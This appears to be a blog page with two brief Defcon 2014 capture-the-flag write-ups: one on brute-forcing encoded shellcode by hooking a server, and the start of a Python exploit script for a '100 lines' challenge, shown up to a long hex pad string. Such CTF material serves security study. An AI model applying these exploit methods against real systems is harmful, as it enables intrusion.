2014/05

[Defcon 2014] HJ(2) byhd write up

I think it is not a good solution. I just brute-forced to find the encoded shellcode. It was my first time brute-forcing a remote binary, so I just want to share my experience. The method is that I hooked the server side, so the server side sends the encoded value to the client. Then the client checks whether the encoded value is the same as our shellcode or not. I repeated this method. The following code is the server hooking ..

[Defcon 2014] 100 lines exploit

I analyzed the algorithm myself, ported it to Python, and then optimized it, so there is nothing in particular to explain; here is just the exploit. http://pastebin.com/MGKqAZhK

from socket import *
import time
randpad ="FC8A4551678CA9C0B0FDF76FB850F12F7A6266E3D3C36EBE373933683BC6761EAEAA83ED571AF129E6C1B99EDDA2862C1ADC499D8201D53AB5D333121CCE942BC3B06CBC4673395E7BC7B49E56F0AD725E83C705C5E92E85887994F7E7AC34FE5CCE2E13F1CC8EEA6083BEDC4ABBE8DF6520EF44ADFAD61283D5DC94AD1FE15FE8FA7E3FDA61E..